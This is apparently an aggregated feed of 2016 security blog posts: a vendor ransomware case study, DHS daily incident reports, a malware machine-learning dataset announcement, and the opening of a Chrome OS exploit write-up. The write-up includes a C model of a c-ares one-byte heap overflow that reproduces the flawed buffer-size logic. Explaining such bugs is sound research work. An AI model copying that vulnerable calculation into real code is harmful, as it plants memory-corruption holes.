“Few businesses realise the seriousness of these threats and the damage they can have on a business,” says Steyn. “The problem we have found is twofold; firstly, businesses do not have adequate security software protecting their network, and secondly, they do not have effective backups in place,” continues Steyn.

He recognises that these advanced threats stem from a situation in which hackers no longer need to be tech-savvy, since ready-made malware toolkits are available on the dark web. New malware variants are created daily and many security vendors are unable to keep up. As a result, businesses are being attacked more often, and cybercrime has become more profitable and easier to carry out than ever before.

Speaking to Panda Security about his experience working with many South African businesses, Steyn says, “We have noticed two-week spikes in attacks that most often occur on the weekend when there are few people in the office. This puts businesses in a tough position that often leads to payment of the ransom or, worse, a loss of company data.”

Taking note of the shifting dynamic, IQ Retail developed a multi-layered approach, implementing security solutions at every level of their infrastructure, as well as ensuring backups are in place and procedures are being followed. Despite their efforts, ransomware was still able to penetrate their network.

Advanced Protection

In order to prevent further breaches, Steyn and his team did extensive research into solutions offered by various vendors. They discovered that conventional AV solutions are unable to prevent zero-day ransomware and other advanced threats from entering the network.
Steyn turned to Panda to implement a final effort to mitigate the threat of ransomware. “Through our research, we realised that Panda’s Adaptive Defense 360 software is the only solution that could give us comprehensive protection. AD360 allows us to proactively manage the security on our network and track possible risk situations,” says Steyn.

The Solution

Steyn explains that the current environment requires new generation protection solutions such as Adaptive Defense 360 that provide an Endpoint Detection and Response (EDR) service to accurately classify all running programs on your network. This means that only legitimate programs are able to run.

Panda’s EDR technology model is based on three phases: continuous monitoring of applications on a company’s computers and servers; automatic analysis and correlation using machine learning on Panda’s Big Data platform in the cloud; and finally endpoint hardening and enforcement, blocking all suspicious or dangerous processes and notifying network administrators.

AD360 combines EDR with full conventional Endpoint Protection (EPP) to deliver comprehensive protection.
For more information on how to protect your business from the advanced threats we see today, contact Panda Security.

The post IQ Retail Guards Against New Age Threats with Panda Security appeared first on CyberSafety.co.za.

Check Out My TeePublic Designs

Over the years fans of this blog have asked if I would consider selling merchandise with the TaoSecurity logo. When I taught classes for TaoSecurity from 2005-2007 I designed T-shirts for my students and provided them as part of the registration package. This weekend I decided to exercise my creative side by uploading some designs to TeePublic.

TeePublic offers clothing along with mugs, phone cases, notebooks, and other items.

Two are based on the TaoSecurity logo. One includes the entire logo, along with the company motto of "The Way of Digital Security." The second is a close-up of the TaoSecurity S, which is a modified yin-yang symbol.

Two other designs are inspired by network security monitoring. One is a 1989-era map of MilNet, the United States' military network. This image is found in many places on the Internet, and I used it previously in my classes. The second is a close-up of a switch and router from the TaoSecurity labs. I used this equipment to create packet captures for teaching network security monitoring.

I hope you like these designs. I am particularly partial to the TaoSecurity Logo mug, the TaoSecurity S Logo Mug, and TaoSecurity S Logo t-shirt.

Let me know what you think via comments here.

Update 28 Dec 2016:

Check out the MilNet mug!


Friday, December 16, 2016



Complete DHS Report for December 16, 2016

Daily Report

Top Stories

• The former president of the Bank of Union (BOU) in El Reno, Oklahoma, was charged December 13 after he and 4 co-conspirators allegedly caused the bank over $100,000,000 in losses. – U.S. Attorney’s Office, Western District of Oklahoma See item 2 below in the Financial Services Sector

• Federal officials approved December 13 a guilty plea and an $11.2 million settlement with a ConAgra Foods, Inc. subsidiary to resolve an investigation into a 2006 Salmonella outbreak linked to the firm’s Peter Pan peanut butter that sickened at least 625 people in 47 States. – Associated Press

11. December 13, Associated Press – (National) ConAgra to pay $11.2M to settle tainted peanut butter case. The U.S. Department of Justice approved December 13 a guilty plea and an $11.2 million settlement with a ConAgra Foods, Inc. subsidiary to resolve an investigation into a 2006 Salmonella outbreak linked to the firm’s contaminated Peter Pan peanut butter that sickened at least 625 people in 47 States. Source: http://www.cbs8.com/story/34037383/conagra-to-pay-112m-to-settle-tainted-peanut-butter-case

• About 200,000 gallons of untreated wastewater spilled into Bear Creek in Mocksville, North Carolina, December 13 due to a force main break. – Salisbury Post

14. December 14, Salisbury Post – (North Carolina) 200,000 gallons of wastewater spills into Mocksville’s Bear Creek. A force main break near a tributary of Bear Creek in Mocksville, North Carolina, caused an estimated 200,000 gallons of untreated wastewater to spill into the creek in the South Yadkin River Basin December 13. Officials stated the force main break occurred after friction from rocks caused a pipe to fail.  Source: http://www.salisburypost.com/2016/12/14/200000-gallons-wastewater-spills-mocksvilles-bear-creek/

• Yahoo Inc. reported December 14 that the data associated with more than 1 billion user accounts may have been compromised in an August 2013 breach. – SecurityWeek See item 20 below in the Information Technology Sector

Financial Services Sector

2. December 14, U.S. Attorney’s Office, Western District of Oklahoma – (Oklahoma) Former bank president indicted in connection with $100,000,000 bank failure. The former president of the Bank of Union (BOU) in El Reno, Oklahoma, was charged December 13 after he and 4 co-conspirators allegedly defrauded BOU by issuing loans with under-secured or unsecured collateral and falsifying financial statements for several bank borrowers, concealing the bank’s true financial condition from the Board of Directors and the Federal Deposit Insurance Corporation (FDIC), and originating nominee loans to circumvent the bank’s legal lending limit, among other fraudulent actions, from 2009 – 2013, which caused the bank more than $100,000,000 in losses. In January 2014, State banking regulators closed BOU due to the losses it incurred as a result of the scheme.
Source: https://www.justice.gov/usao-wdok/pr/former-bank-president-indicted-connection-100000000-bank-failure

Information Technology Sector

19. December 14, SecurityWeek – (International) SAP resolves multiple information disclosure flaws. SAP released its December 2016 security patches, which feature 20 Patch Day Security Notes and updates for 2 previously released notes to resolve a total of 31 vulnerabilities affecting several SAP products, including an information disclosure flaw in SAP Business Objects Explorer which could be leveraged to reveal additional information such as system data or debugging information, among other patched flaws. The updates also resolve three flaws in 2 SAP for Defense Forces & Public Security components that could allow an attacker to read, alter, or delete restricted data.

20. December 14, SecurityWeek – (International) Yahoo says newly discovered hack hit 1 billion accounts. Yahoo Inc. reported December 14 that the data associated with more than 1 billion user accounts may have been compromised in an August 2013 breach after attackers reportedly accessed the company’s proprietary code to learn how to forge cookies. Yahoo officials claimed the breach was conducted by a State sponsored actor and the breach remains under investigation. Source: http://www.securityweek.com/yahoo-says-newly-discovered-hack-hit-1-billion-accounts

21. December 14, Agence France-Presse – (International) Ashley Madison dating site to pay $1.6 million over breach. Ruby Corp., the parent company of the Ashley Madison discreet dating Website, agreed December 14 to pay a $1.6 million penalty to settle charges with the U.S. Federal Trade Commission and State regulators after a hacker group released the data of 36 million users of the Website in 46 countries in 2015. The settlement requires Ashley Madison to implement a wide range of data security practices to better protect its users’ personal information from malicious actors in the future. Source: http://www.securityweek.com/ashley-madison-dating-site-pay-16-million-over-breach

Communications Sector

Nothing to report

Malware Training Sets: A machine learning dataset for everyone

One of the most challenging tasks in machine learning is to define a good training (and possibly dynamic) dataset. Assuming a well-known learning algorithm and a periodic supervised learning process, what you need is a classified dataset to train your machine well. Thousands of training datasets are available out there, from "flowers" to "dice" through "genetics", but I was not able to find a good classified dataset for malware analysis. So I decided to build one myself and to share the dataset with the scientific community (and everybody interested in it) to give everyone a starting point for machine learning in malware analysis. The first challenge I faced was to define the features and how to extract them. Basically I had two choices:
  1. Extracting features directly from the samples. This is the easiest solution, since the extracted features would relate directly to the sample, such as (but not limited to) file sections, entropy, syscalls and decompiled assembly n-grams.
  2. Extracting features from analyses of the samples. This is the harder solution, since it would include both static analysis, such as (but not limited to) file sections, entropy and syscall/API usage, and dynamic analysis, such as (but not limited to) contacted IPs, DNS queries, executed processes, AV signatures, etc. It also needs a complex dynamic analysis system including multiple sandboxes and static analysers.
I decided to follow the harder path and extract features from both the static analysis and the dynamic analysis (detonation) of the samples, in order to collect as many features as possible and leave the data scientist free to decide which features to use and which to drop in the data-mining process. The analyses were performed by detonating the samples in several sandboxes (free and commercial), which produced a first stage of ontologically homogeneous blocks called "Analyses Results" (AR). ARs are too verbose and do not perform well in any text algorithm I know of.

After more reading on the topic I came across the Malware Instruction Set for Behaviour Analysis (MIST) described in Philipp Trinius et al. (document available here). MIST is an optimised representation for effective and efficient analysis of behaviour using data mining and machine learning techniques. It can be obtained automatically during analysis of malware with a behaviour monitoring tool, or by converting existing behaviour reports. The representation is not restricted to a particular monitoring tool and thus can also be used as a meta language to unify behaviour reports from different sources. The following image shows the MIST encoding structure.



A simple example taken directly from the aforementioned paper is shown in the following image, where "load.dll" has been detected. The 'load dll' system call is executed by every piece of software several times during process initialisation and at run time, since under Windows dynamic-link libraries (DLLs) are used to implement the Windows subsystem and offer an interface to the operating system. The image shows how load.dll has been encoded into the MIST meta language.

I decided to use the same concept of a "meta language" but with self-descriptive logic (without encoding the operation category, since it would not affect the analyses), and with every piece of information organised into a well-formed JSON file rather than a line-based text file, so that it can be used in external environments with zero effort. The produced datasets look like the following:

Dataset snippet
Each JSON property could be used as a feature of your chosen machine learning algorithm, but the most significant ones are the fields under the "properties" section. Each property (each field placed under the "properties" section of the produced JSON file) is optional and is structured as follows:

category_action_with_description | "sanitized" involved subjects, separated by spaces

So for example:

"sig_copies_self": "e5ed769a e5ed769a 98e83379"

It means the category is sig (which stands for signature) and the action is "copies itself". e5ed769a e5ed769a 98e83379 are 3 sanitized pieces of evidence of where the sample copies itself (see the Sanitization Procedure).

"sig_antimalware_metascan": ""

It means the category is sig (signature) and the action is "antimalware_metascan". The evidence is empty, meaning Metascan found no signature (in this case).

"sig_antivirus_virustotal": "ffebfdb8 9dbdd699 600fe39f 45036f7d 9a72943b"

It means the VirusTotal signature found 5 pieces of evidence (ffebfdb8 9dbdd699 600fe39f 45036f7d 9a72943b).

A fundamental property is "label", which classifies the malware family. I decided to name this field "label" rather than "malware_name", "malware_family" or "classification" to stay compatible with the many machine learning implementations that expect a field named "label" in order to work properly (it seems to be a de facto standard for many engines).

Sanitization Procedures

The aim of the project is to provide a useful, classified dataset to researchers who want to investigate malware analysis more deeply using machine learning techniques. Text mining needs to be fast, so I decided to use some well-known sanitization techniques to "hash" the evidence, leaving its meaning unchanged while drastically improving speed from the algorithm's point of view. The following picture shows the sanitization procedures:


Sanitization Procedures

From a developer's perspective the procedures cited (and shown) above are not well written; for example, they are not protected against bad input, and ".replace" may not be safe for specific inputs. For that reason I will not release the code. But please keep in mind that the result of my project is not the "sanitization code" but its outcome: the classified malware analysis dataset. I focused my attention on feature extraction, sample collection, aggregation, conversion and, of course, analysis, not on developing production code.

Training DataSets Generation: The Simplified Process

The whole process to obtain the training datasets is described in the following flowchart. Detonating a classified malware sample in multiple sandboxes produces multiple static and dynamic analyses, which are merged into an analyses results artefact (AR). The AR is then translated into a MIST-derived meta language so that it is software agnostic and gives data scientists freedom.



Data Samples

Today (please refer to the blog post date) the collected classified dataset is composed of the following samples:
  • APT1 292 Samples
  • Crypto 2024 Samples
  • Locker 434 Samples
  • Zeus 2014 Samples
If you own classified malware samples and want to share them with me to contribute to the Machine Learning Training Datasets, you are welcome; just drop me an email!
I will definitely process the samples and build new datasets to share with everybody.

Where can I download the training datasets? HERE


Available Features and Frequency

The following list enumerates the available features for each sample. The features, as mentioned, are optional, meaning that not every sample carries all of the same features. If the sample you are analysing lacks a specific feature you want, consider it None (or undefined), since that feature was not available for that sample. So if you are writing your own machine learning algorithm you should include a "purification procedure" that ignores None features during training and/or querying.
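The property format described above and the "purification" step this paragraph asks for, as an added Python example (my own code, not from the post or its dataset tooling): it splits each category_action key and its space-separated sanitized tokens, keeps an empty evidence string distinct from an absent feature, and drops absent (None) features before training. The two records and the top-level shape (one object per sample holding "label" and "properties") are constructed assumptions for illustration.

```python
r"""Added example: consume the Malware Training Sets JSON layout.

Every key under "properties" is category_action_with_description and
its value is a space-separated string of sanitized evidence tokens;
"label" names the malware family.  Features a sample lacks become None
and are removed by purify() so the learner never sees absence as a
value.  SAMPLE_JSON is constructed for illustration; the top-level
shape is an assumption about the file layout."""
import json
from collections import Counter

SAMPLE_JSON = r'''[
  {"label": "Zeus",
   "properties": {
     "sig_copies_self": "e5ed769a e5ed769a 98e83379",
     "sig_antimalware_metascan": "",
     "sig_antivirus_virustotal": "ffebfdb8 9dbdd699 600fe39f 45036f7d 9a72943b",
     "net_dns": "0a1b2c3d"}},
  {"label": "Locker",
   "properties": {
     "sig_ransomware_message": "deadbeef",
     "sig_antivirus_virustotal": "ffebfdb8 11223344"}}
]'''

# Subset of the feature names listed in the post; a real run would use the
# union of keys seen across the whole dataset (see feature_frequency).
FEATURE_NAMES = ["sig_copies_self", "sig_antimalware_metascan",
                 "sig_antivirus_virustotal", "net_dns",
                 "sig_ransomware_message"]


def load_samples(text):
    """Parse the JSON text into a list of sample dicts."""
    return json.loads(text)


def parse_property(key, value):
    """Split one property into (category, action, evidence tokens).
    'sig_copies_self' -> ('sig', 'copies_self', [...]); an empty value
    means the signature produced no evidence (present, but empty)."""
    category, _, action = key.partition("_")
    return category, action, value.split()


def feature_row(sample, feature_names):
    """Map each requested feature to its evidence token list, or to None
    when the sample does not carry that property at all.  An empty
    evidence string stays distinguishable from absence: it becomes []."""
    props = sample.get("properties", {})
    return {name: (props[name].split() if name in props else None)
            for name in feature_names}


def purify(row):
    """The purification procedure: drop None features so they are
    ignored during training and querying."""
    return {name: tokens for name, tokens in row.items()
            if tokens is not None}


def feature_frequency(samples):
    """Count how many of the loaded samples carry each property."""
    counts = Counter()
    for sample in samples:
        counts.update(sample.get("properties", {}).keys())
    return counts


def training_set(samples, feature_names):
    """Return (purified feature row, label) pairs ready for a learner."""
    return [(purify(feature_row(s, feature_names)), s["label"])
            for s in samples]


if __name__ == "__main__":
    samples = load_samples(SAMPLE_JSON)
    for row, label in training_set(samples, FEATURE_NAMES):
        print(label, sorted(row))
    print(feature_frequency(samples).most_common(3))
```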

List of currently available features with occurrence counts:

   'file_access': 138759,
   'sig_infostealer_ftp': 13114,
   'sig_modifies_hostfile': 5,
   'sig_removes_zoneid_ads': 16,
   'sig_disables_uac': 33,
   'sig_static_versioninfo_anomaly': 0,
   'sig_stealth_webhistory': 417,
   'reg_write': 11942,
   'sig_network_cnc_http': 132,
   'api_resolv': 954690,
   'sig_stealth_network': 71,
   'sig_antivm_generic_bios': 6,
   'sig_polymorphic': 705,
   'sig_antivm_generic_disk': 7,
   'sig_antivm_vpc_keys': 0,
   'sig_antivm_xen_keys': 5,
   'sig_creates_largekey': 16,
   'sig_exec_crash': 6,
   'sig_antisandbox_sboxie_libs': 144,
   'sig_mimics_icon': 2,
   'sig_stealth_hidden_extension': 9,
   'sig_modify_proxy': 384,
   'sig_office_security': 20,
   'sig_bypass_firewall': 29,
   'sig_encrypted_ioc': 476,
   'sig_dropper': 671,
   'reg_delete': 2545,
   'sig_critical_process': 3,
   'service_start': 312,
   'net_dns': 486,
   'sig_ransomware_files': 5,
   'sig_virus': 781,
   'file_write': 20218,
   'sig_antisandbox_suspend': 2,
   'sig_sniffer_winpcap': 16,
   'sig_antisandbox_cuckoocrash': 11,
   'file_delete': 5405,
   'sig_antivm_vmware_devices': 1,
   'sig_ransomware_recyclebin': 0,
   'sig_infostealer_keylog': 44,
   'sig_clamav': 1350,
   'sig_packer_vmprotect': 1,
   'sig_antisandbox_productid': 18,
   'sig_persistence_service': 5,
   'sig_antivm_generic_diskreg': 162,
   'sig_recon_checkip': 4,
   'sig_ransomware_extensions': 4,
   'sig_network_bind': 190,
   'sig_antivirus_virustotal': 175975,
   'sig_recon_beacon': 23,
   'sig_deletes_shadow_copies': 24,
   'sig_browser_security': 216,
   'sig_modifies_desktop_wallpaper': 83,
   'sig_network_torgateway': 1,
   'sig_ransomware_file_modifications': 23,
   'sig_antivm_vbox_files': 7,
   'sig_static_pe_anomaly': 2194,
   'sig_copies_self': 591,
   'sig_antianalysis_detectfile': 51,
   'sig_antidbg_devices': 6,
   'file_drop': 6627,
   'sig_driver_load': 72,
   'sig_antimalware_metascan': 1045,
   'sig_modifies_certs': 46,
   'sig_antivm_vpc_files': 0,
   'sig_stealth_file': 1566,
   'sig_mimics_agent': 131,
   'sig_disables_windows_defender': 3,
   'sig_ransomware_message': 10,
   'sig_network_http': 216,
   'sig_injection_runpe': 474,
   'sig_antidbg_windows': 455,
   'sig_antisandbox_sleep': 271,
   'sig_stealth_hiddenreg': 13,
   'sig_disables_browser_warn': 20,
   'sig_antivm_vmware_files': 6,
   'sig_infostealer_mail': 617,
   'sig_ipc_namedpipe': 13,
   'sig_persistence_autorun': 2355,
   'sig_stealth_hide_notifications': 19,
   'service_create': 62,
   'sig_reads_self': 14460,
   'mutex_access': 15017,
   'sig_antiav_detectreg': 4,
   'sig_antivm_vbox_libs': 0,
   'sig_antisandbox_sunbelt_libs': 2,
   'sig_antiav_detectfile': 2,
   'reg_access': 774910,
   'sig_stealth_timeout': 1024,
   'sig_antivm_vbox_keys': 0,
   'sig_persistence_ads': 3,
   'sig_mimics_filetime': 3459,
   'sig_banker_zeus_url': 1,
   'sig_origin_langid': 71,
   'sig_antiemu_wine_reg': 1,
   'sig_process_needed': 137,
   'sig_antisandbox_restart': 24,
   'sig_recon_programs': 5318,
   'str': 1443775,
   'sig_antisandbox_unhook': 1364,
   'sig_antiav_servicestop': 78,
   'sig_injection_createremotethread': 311,
   'pe_imports': 301256,
   'sig_process_interest': 295,
   'sig_bootkit': 25,
   'reg_read': 458477,
   'sig_stealth_window': 1267,
   'sig_downloader_cabby': 50,
   'sig_multiple_useragents': 101,
   'pe_sec_character': 22180,
   'sig_disables_windowsupdate': 0,
   'sig_antivm_generic_system': 6,
   'cmd_exec': 2842,
   'net_con': 406,
   'sig_bcdedit_command': 14,
   'pe_sec_entropy': 22180,
   'pe_sec_name': 22180,
   'sig_creates_nullvalue': 1,
   'sig_packer_entropy': 3603,
   'sig_packer_upx': 1210,
   'sig_disables_system_restore': 6,
   'sig_ransomware_radamant': 0,
   'sig_infostealer_browser': 7,
   'sig_injection_rwx': 3613,
   'sig_deletes_self': 600,
   'file_read': 50632,
   'sig_fraudguard_threat_intel_api': 226,
   'sig_deepfreeze_mutex': 1,
   'sig_modify_uac_prompt': 1,
   'sig_api_spamming': 251,
   'sig_modify_security_center_warnings': 18,
   'sig_antivm_generic_disk_setupapi': 25,
   'sig_pony_behavior': 159,
   'sig_banker_zeus_mutex': 442,
   'net_http': 223,
   'sig_dridex_behavior': 0,
   'sig_internet_dropper': 3,
   'sig_cryptAM': 0,
   'sig_recon_fingerprint': 305,
   'sig_antivm_vmware_keys': 0,
   'sig_infostealer_bitcoin': 207,
   'sig_antiemu_wine_func': 0,
   'sig_rat_spynet': 3,
   'sig_origin_resource_langid': 2255


Cite The DataSet

If you find these results useful, please cite them:

@misc{ MR,
author = "Marco Ramilli",
title = "Malware Training Sets: a machine learning dataset for everyone",
year = "2016",
url = "http://marcoramilli.blogspot.it/2016/12/malware-training-sets-machine-learning.html",
note = "[Online; December 2016]"
}


Again, if you want to contribute and you own classified samples, please send them to me and I will extend the dataset.

Enjoy your new researches!

Thursday, December 15, 2016



Complete DHS Report for December 15, 2016

Daily Report

Top Stories

• Thirty-five individuals connected to the Brooklyn, New York-based Hoodstarz street gang and associated crews were charged December 13 for allegedly buying more than 750 credit card numbers from the Dark Web and using the numbers to create fraudulent credit cards. – WNBC 4 New York See item 5 below in the Financial Services Sector

• A Nigerian national pleaded guilty December 12 for his role in a roughly $4.7 million scheme to file thousands of fraudulent Federal and Oregon State tax returns from 2012 – 2015. – Medford Mail Tribune See item 6 below in the Financial Services Sector

• The Stamford Water Pollution Control Authority in Connecticut reported that 84,000 gallons of raw sewage leaked into the East Branch of Stamford Harbor December 13. – Stamford Advocate

15. December 14, Stamford Advocate – (Connecticut) Broken pipe leaks 84,000 gallons of sewage into Stamford Harbor. The Stamford Water Pollution Control Authority in Connecticut reported that 84,000 gallons of raw sewage leaked into the East Branch of Stamford Harbor December 13 after a force main pipe broke at the city’s water pollution control plant. Officials stated that the spill has been contained and the pipe is being repaired. Source: http://www.stamfordadvocate.com/local/article/Broken-pipe-leaks-84-000-gallons-of-sewage-into-10795509.php

• Frederick County Public Schools officials in Maryland announced December 13 that the personal information of about 1,000 former students was stolen and offered for sale online following a data breach that occurred before 2010. – Frederick News-Post

17. December 13, Frederick News-Post – (Maryland) Personal details of about 1,000 former Frederick County students stolen, was for sale. A spokesperson for Frederick County Public Schools in Maryland announced December 13 that the personal information of about 1,000 former students who attended the district’s schools between November 2005 and November 2006 was stolen and offered for sale online following a data breach that occurred before 2010. The breach was discovered in September when a former student found the information online. Source: http://www.fredericknewspost.com/news/education/schools/personal-details-of-about-former-frederick-county-students-stolen-was/article_147339b1-de16-513b-8288-0e0ba62bf506.html

Financial Services Sector

5. December 14, WNBC 4 New York – (New York) Brooklyn gang members used fake credit cards to buy American Girl dolls, guns: Officials. Thirty-five individuals connected to the Brooklyn, New York-based Hoodstarz street gang and associated crews were charged December 13 for allegedly buying more than 750 credit card numbers from the Dark Web and using the numbers to create fraudulent credit cards, which the group used to buy dolls, concert tickets, and weapons, as well as to fund violent crimes. The charges allege that the group tested the fraudulent credit cards by charging $1 at parking meters. Source: http://www.nbcnewyork.com/news/local/Fake-Credit-Card-Brooklyn-Gang-Indictment-Violence-American-Girl-Dolls-Hoodstarz-406312075.html

6. December 14, Medford Mail Tribune – (International) Stolen PINs net nearly $5 million in tax fraud. A Nigerian national pleaded guilty December 12 for his role in a roughly $4.7 million scheme to file thousands of fraudulent Federal and Oregon State tax returns from 2012 – May 2015 where he and 5 co-conspirators obtained the personal information of more than 250,000 people from an overseas hacker, and used the information to get PIN numbers used by the victims to electronically file U.S. Internal Revenue Service (IRS) returns. The IRS paid refunds directly to prepaid debit cards or third-party bank accounts the group opened, and the co-conspirators subsequently wired some of the refunds to Nigeria via the Western Union Company. Source: http://www.mailtribune.com/news/20161213/stolen-pins-net-nearly-5-million-in-tax-fraud

For another story, see item 4 below from the Critical Manufacturing Sector

4. December 12, Washington Post – (California) A Calif. man steals $5 million, spends $1 million on a cellphone game. A California man pleaded guilty December 8 after he defrauded his employer, Holt Manufacturing Company, out of nearly $5 million from May 2008 – March 2015 by conducting hundreds of unauthorized credit card transactions on the firm’s commercial account, falsifying records regarding the account, and misleading the bank that held the credit account when it made inquiries about suspicious transactions. The former employee used the stolen funds for personal expenses. Source: https://www.washingtonpost.com/news/morning-mix/wp/2016/12/12/a-calif-man-stole-nearly-5-million-from-his-company-then-spent-1-million-on-a-cellphone-game/?utm_term=.1eab2b6b5a60

Information Technology Sector

18. December 14, SecurityWeek – (International) Apple patches 72 vulnerabilities in macOS Sierra. Apple released version 10.12.2 of its Sierra operating system (OS) patching a total of 72 vulnerabilities in Apache, Audio, Bluetooth, security, the kernel, and Disk Images, among other components, after security researchers discovered that the flaws could be exploited to cause an application to enter a denial-of-service (DoS) condition, execute arbitrary code with elevated privileges, leak memory data, and overwrite existing files, among other nefarious actions. Apple also released security updates for iCloud for Microsoft Windows, iTunes for Windows, and Safari 10.0.2, which resolved two dozen flaws.

19. December 14, SecurityWeek – (International) Microsoft patches several publicly disclosed flaws. Microsoft released its December 2016 security updates, which include a total of 12 critical and important security bulletins that resolve flaws in Windows, Office, Edge, and Internet Explorer, including 11 flaws in Edge, an information disclosure and 2 remote code execution bugs in the Windows graphics component, and 16 privilege escalation, information disclosure, and arbitrary code execution flaws, among other flaws, in Office and Office for Apple Mac. One of the critical bulletins also includes patches for Adobe Flash Player, in which Adobe resolved a total of 17 vulnerabilities, including a zero-day flaw that was being exploited in targeted attacks.

20. December 14, Help Net Security – (International) Corporate Office 365 users hit with clever phishing attack. Security researchers reported that phishers are targeting users of Microsoft’s Corporate Office 365 service to bypass its email filters and default security protections using a trick that makes the user see one Uniform Resource Locator (URL) in the link and anti-phishing filters another link, while the actual link leads the victim to a third, phishing URL. The malicious actors exploit the way that Office 365 anti-phishing and URL-reputation security layers translate Punycode, the method for encoding domain names with Unicode characters.
Source: https://www.helpnetsecurity.com/2016/12/14/corporate-office-365-phishing/

21. December 13, Help Net Security – (International) More Android-powered devices found with trojans in their firmware. Doctor Web security researchers discovered two types of downloader trojans incorporated in the firmware of several Android-powered devices. The trojans are used to deliver ad-showing apps that push users to download additional apps, and are capable of updating themselves, contacting their command and control (C&C) servers, receiving instructions on which apps to covertly download and run, and starting each time the device is turned on. One of the trojans, dubbed Android.Sprovider.7, was found inserted into the firmware of Lenovo smartphones and can open specified links in a browser, as well as show ads on top of apps and in the status bar, among other malicious actions. Source: https://www.helpnetsecurity.com/2016/12/13/android-devices-trojans-firmware/

22. December 13, Help Net Security – (International) 93% of SOC managers unable to triage all potential threats. Intel Security released a report after interviewing 400 Security Operations Center (SOC) managers across several countries, industries, and company sizes, which revealed that on average, organizations are unable to adequately investigate 25 percent of security alerts, as many as 93 percent of SOCs are unable to triage all potential threats, and that the most common threat detection signals for 64 percent of companies come from traditional security control points, including firewall and intrusion prevention systems, among other findings.
Source: https://www.helpnetsecurity.com/2016/12/13/soc-managers-triage-threats/

23. December 13, SecurityWeek – (International) Apple patches 12 vulnerabilities in iOS, tvOS, and watchOS. Apple released version 10.2 of its mobile operating system (iOS) resolving 12 vulnerabilities affecting several components in iPhone 5 and later, iPad 4th generation and later, and iPod touch 6th generation and later, including a memory corruption issue in the Profiles component, which was also found to impact 4th generation Apple TV and all Apple Watch models, that could allow an attacker to achieve arbitrary code execution if the victim opened a specially crafted certificate on a vulnerable device.

Communications Sector
24. December 14, Help Net Security – (International) Netgear pushes out beta firmware for vulnerable router models. Netgear released a beta firmware to temporarily resolve a vulnerability affecting at least 12 of its router models after confirming the flaw could allow remote, unauthenticated attackers to execute Linux commands with root privileges on the routers if the commands are appended to the Uniform Resource Locator (URL) of a page that the user is tricked into visiting. Netgear is reviewing its router portfolio to determine if the flaw affects other router models. Source: https://www.helpnetsecurity.com/2016/12/13/netgear-firmware-vulnerable-routers/

Chrome OS exploit: one byte overflow and symlinks

The following article is a guest blog post from an external researcher (i.e. the author is not a Project Zero or Google researcher).

This post is about a Chrome OS exploit I reported to the Chrome VRP in September. The Project Zero folks were kind enough to let me write a guest post about it, so here goes. The report includes a detailed writeup, so this post will go into less detail.

1 byte overflow in a DNS library

In April I found a TCP port listening on localhost in Chrome OS. It was an HTTP proxy built into shill, the Chrome OS network manager. The proxy has since been removed as part of the fix, but its source can still be seen in an old revision: shill/http_proxy.cc. The code is simple and doesn’t seem to contain any obviously exploitable bugs, although it is very liberal in what it accepts as incoming HTTP. It calls into the c-ares library to resolve DNS names, and c-ares had a possible one-byte overflow while building the DNS query packet. Here is the vulnerable code, stripped heavily from the original to make the bug more visible:

[Figure: ares_create_query.png]

It parses dot-separated labels and writes them into a buffer allocated by malloc(). Each label is prefixed by a length byte, and the separating dots are omitted. The buffer length calculation is essentially just a strlen(): a dot that follows a label accounts for that label’s length byte. The last label may or may not end with a dot. If it doesn’t, the buffer length is incremented in the first black box to account for the length byte of the last label.

Dots may be escaped, though, and an escaped dot is part of a label rather than a separator. If the last label ends with “\.”, an escaped dot, the first black box wrongly concludes that the length byte of the last label has already been accounted for. The buffer is one byte short, and the least significant byte of dnsclass is written past its end. The value of dnsclass is most commonly the constant 1 (class IN).
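Here is a small C model of that length computation, added for this page rather than taken from c-ares or the report. name_wire_len walks the labels the way the encoder does and returns the size the buffer really needs; alloc_len_vulnerable mirrors the flawed size calculation described above (count the characters, then add a length byte unless the last raw character is a dot); alloc_len_fixed is one way to correct it, by remembering whether the final character consumed was an unescaped separator. The function names, the simplified encoder and the sample names are constructed for illustration, and c-ares’s actual fix may be written differently.

```c
#include <stddef.h>
#include <stdio.h>

/* Wire length of NAME encoded as DNS labels, computed the way the encoder
 * actually writes it: one length byte per label, separating dots dropped,
 * "\x" kept as the single literal byte x, and a zero-length root label at
 * the end.  This is the size the buffer really needs. */
size_t name_wire_len(const char *name)
{
    size_t len = 1;                       /* terminating root label */
    const char *p = name;
    while (*p) {
        size_t label = 0;
        for (; *p && *p != '.'; p++) {
            if (*p == '\\' && p[1] != '\0')
                p++;                      /* escaped character, e.g. "\." */
            label++;
        }
        len += 1 + label;                 /* length byte plus label data */
        if (*p == '.')
            p++;                          /* skip the separator */
    }
    return len;
}

/* Size calculation modelled on the vulnerable logic described above: count
 * the characters the name consumes (an escape pair counts once), then add
 * one length byte for the last label unless the name is empty or its last
 * raw character is a dot. */
size_t alloc_len_vulnerable(const char *name)
{
    size_t len = 0;
    const char *p;
    for (p = name; *p; p++) {
        if (*p == '\\' && p[1] != '\0')
            p++;
        len++;
    }
    /* BUG: a trailing escaped dot ("\.") is label data, not a separator,
     * but only the raw last character is inspected, so the length byte of
     * the final label is never counted. */
    if (*name && p[-1] != '.')
        len++;
    return len + 1;                       /* root label */
}

/* One correct version: remember whether the last character consumed was an
 * unescaped separator instead of re-reading the raw byte afterwards. */
size_t alloc_len_fixed(const char *name)
{
    size_t len = 0;
    int last_was_sep = 0;
    const char *p;
    for (p = name; *p; p++) {
        if (*p == '\\' && p[1] != '\0') {
            p++;
            last_was_sep = 0;             /* "\." is data */
        } else {
            last_was_sep = (*p == '.');
        }
        len++;
    }
    if (*name && !last_was_sep)
        len++;
    return len + 1;
}

/* Encode NAME into OUT (capacity CAP).  Returns the bytes written, or 0 if
 * the encoding does not fit; this bounds check is what the vulnerable code
 * lacked. */
size_t encode_name(const char *name, unsigned char *out, size_t cap)
{
    if (name_wire_len(name) > cap)
        return 0;
    unsigned char *q = out;
    const char *p = name;
    while (*p) {
        unsigned char *lenbyte = q++;     /* filled in once the label is copied */
        size_t label = 0;
        for (; *p && *p != '.'; p++) {
            if (*p == '\\' && p[1] != '\0')
                p++;
            *q++ = (unsigned char)*p;
            label++;
        }
        *lenbyte = (unsigned char)label;
        if (*p == '.')
            p++;
    }
    *q++ = 0;
    return (size_t)(q - out);
}

/* Bytes the encoder writes past a buffer sized with the vulnerable
 * calculation: 0 for ordinary names, 1 for a name ending in "\.". */
int overflow_bytes(const char *name)
{
    return (int)name_wire_len(name) - (int)alloc_len_vulnerable(name);
}

int main(void)
{
    /* Constructed sample names; only the last one ends with an escaped dot. */
    const char *names[] = { "www.example.com", "a.b.", "a\\\\.", "a\\." };
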